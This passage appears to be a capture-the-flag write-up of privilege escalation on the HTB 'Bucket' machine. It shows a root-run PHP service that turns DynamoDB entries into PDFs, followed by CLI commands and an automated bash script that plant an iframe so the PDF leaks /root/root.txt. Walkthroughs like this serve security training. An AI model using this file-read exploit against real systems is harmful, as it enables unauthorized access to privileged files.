6 privesc
As service running on port 8000 is assigned user:root
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
http://localhost:8000/
Site under construction or maintenance
roy@bucket:~$ ls -la /var/www/bucket-app/
total 856
drwxr-x---+ 4 root root 4096 Feb 10 2021 .
drwxr-xr-x 4 root root 4096 Feb 10 2021 ..
-rw-r-x---+ 1 root root 63 Sep 23 2020 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 2020 composer.lock
drwxr-x---+ 2 root root 4096 Feb 10 2021 files
-rwxr-x---+ 1 root root 17222 Sep 23 2020 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Feb 10 2021 vendor
roy@bucket:/var/www/bucket-app$ cat index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>
# if request is POST, action="get_alerts"
# it connects to dynamoDB, scans table: alerts and filters by title: Ransomware
# for each entry, it creates a random.html and add the contents to the file
Exploit Process:
Create table
alerts
Add entry in table with iframe that reads
/root/root.txt
POST request to
:8000
withaction=get_alerts
check for
result.pdf
in/var/www/bucket-app/files/
# creating table in dynamodb
var params = {
"TableName": "kashz",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 10,
"WriteCapacityUnits": 5
}
};
dynamodb.createTable(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# using cli
$ cat create-table.json
{
"TableName": "kashz",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 10,
"WriteCapacityUnits": 5
}
}
$ aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json
# adding using put-item
var params = {
TableName: 'kashz',
Item: {
"title": "ransomware",
"data": "/root/root.txt",
},
};
docClient.put(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# using cli
$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name kashz --item '{"title":{"S":"item3"},"data":{"S":"/root/root.txt"}}'
# now to send request to :8000 with action=get_alerts
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"
Automated Exploit File
# using script
#!/bin/bash
echo "Creating 'alerts' table:"
cat << EOF > create-table.json
{
"TableName": "alerts",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 15,
"WriteCapacityUnits": 10
}
}
EOF
aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json
sleep 2
echo "Adding record:"
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><iframe src=\"/root/root.txt\"></iframe><html>"}}'
sleep 2
echo "Listing records:"
aws dynamodb scan --table-name alerts --endpoint-url http://s3.bucket.htb
echo "Sending POST request:"
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"
echo "Done!"
Now we can read the .pdf
file and it contains the flag.
Last updated